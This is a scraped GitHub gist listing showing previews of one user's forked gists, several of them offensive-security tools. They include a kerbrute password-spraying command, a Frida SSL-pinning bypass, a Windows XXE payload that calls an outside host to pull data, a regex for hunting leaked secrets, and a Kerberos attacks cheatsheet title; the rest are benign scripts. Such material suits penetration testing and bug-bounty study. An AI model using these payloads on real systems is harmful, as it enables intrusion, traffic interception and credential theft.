With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
dslusser
dslusser
/ js_endpoints_new_tab.js
Created
December 21, 2024 19:55
— forked from mhmdiaa/js_endpoints_new_tab.js
All credit goes to @renniepak for the original bookmarklet https://twitter.com/renniepak/status/1602620834463588352
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript: (function() { | |
| var scripts = document.getElementsByTagName("script"), | |
| regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g; | |
| const results = new Set; | |
| for (var i = 0; i < scripts.length; i++) { | |
| var t = scripts[i].src; | |
| "" != t && fetch(t).then(function(t) { | |
| return t.text() | |
| }).then(function(t) { | |
| var e = t.matchAll(regex); |
dslusser
/ Generic keys
Created
October 3, 2024 23:42
— forked from h4x0r-dz/Generic keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
dslusser
/ universalUnpin.js
Created
September 27, 2024 14:39
— forked from teknogeek/universalUnpin.js
Frida Universal™ SSL Unpinner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java.perform(function() { | |
| console.log('\n[.] Cert Pinning Bypass'); | |
| // Create a TrustManager that trusts everything | |
| console.log('[+] Creating a TrustyTrustManager that trusts everything...'); | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
| var TrustyTrustManager = Java.registerClass({ | |
| name: 'com.example.TrustyTrustManager', | |
| implements: [X509TrustManager], | |
| methods: { |
dslusser
/ gist:2e5b3b32d81a66638dc1dd6eb208c17d
Created
April 2, 2024 14:56
— forked from Rhynorater/gist:d0d19f757221a916a22476c3a5c6aba2
Shubs Windows XXE Payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE doc [ | |
| <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> | |
| <!ENTITY % SuperClass '> | |
| <!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices"> | |
| <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>"> | |
| %eval; | |
| %error; | |
| <!ENTITY test "test"' | |
| > | |
| %local_dtd; |
dslusser
/ getAllGlobals.js
Created
April 2, 2024 14:52
— forked from colinrubbert/getAllGlobals.js
Get all runtime global variables set by the app
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * RuntimeGlobalsChecker | |
| * | |
| * You can use this utility to quickly check what variables have been added (or | |
| * leaked) to the global window object at runtime (by JavaScript code). | |
| * By running this code, the globals checker itself is attached as a singleton | |
| * to the window object as "__runtimeGlobalsChecker__". | |
| * You can check the runtime globals programmatically at any time by invoking | |
| * "window.__runtimeGlobalsChecker__.getRuntimeGlobals()". | |
| * |
dslusser
/ download_canvas_rubric.js
Last active
September 14, 2023 21:31
— forked from acbart/download_canvas_rubric.js
Snippet to download Canvas rubric data for current assignment as a CSV file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async function(){ | |
| // More info on usage - dws: | |
| // https://community.canvaslms.com/t5/Canvas-Developers-Group/Rubric-Analysis-Using-the-API/ba-p/270213 | |
| // Basically just copy/paste this script to the Developer Tools -> Console tab on any Canvas Assignment page | |
| // that has a rubic as a grading method. | |
| // Original Github Gist: https://gist.github.com/acbart/0bfd1b2dbc324b345c305e362e00273c | |
| // https://stackoverflow.com/questions/8735792/how-to-parse-link-header-from-github-api |
dslusser
/ AppleScript Mail Send.scpt
Created
February 8, 2023 19:25
— forked from youandhubris/AppleScript Mail Send.scpt
AppleScript to send e-mail, using Apple's Mail, with multiple recipients, cc, bcc and attachments
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| tell application "Mail" | |
| set theFrom to "" | |
| set theTos to {} | |
| set theCcs to {} | |
| set theBccs to {} | |
| set theSubject to "" | |
| set theContent to "" | |
| set theSignature to "" |
dslusser
/ kerberos_attacks_cheatsheet.md
Created
February 5, 2022 04:58
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
dslusser
/ makekali.sh
Last active
January 21, 2021 20:25
— forked from warecrash/makekali.sh
Convert Debian to Kali
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt update | |
| apt -y install wget gnupg dirmngr | |
| wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import | |
| gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6 | |
| echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list | |
| echo "deb http://http.kali.org/kali kali-last-snapshot main non-free contrib" >> /etc/apt/sources.list | |
| gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add - | |
| apt update | |
| apt -y upgrade | |
| apt -y dist-upgrade |
dslusser
/ rvm-to-rbenv.md
Created
February 11, 2019 00:15
— forked from akdetrick/rvm-to-rbenv.md
Guide to switching to rbenv bliss from RVM hell
Why? @sstephenson explains it best here.
This should get rid of the rvm dir and any installed rubies:
$ rvm implode
NewerOlder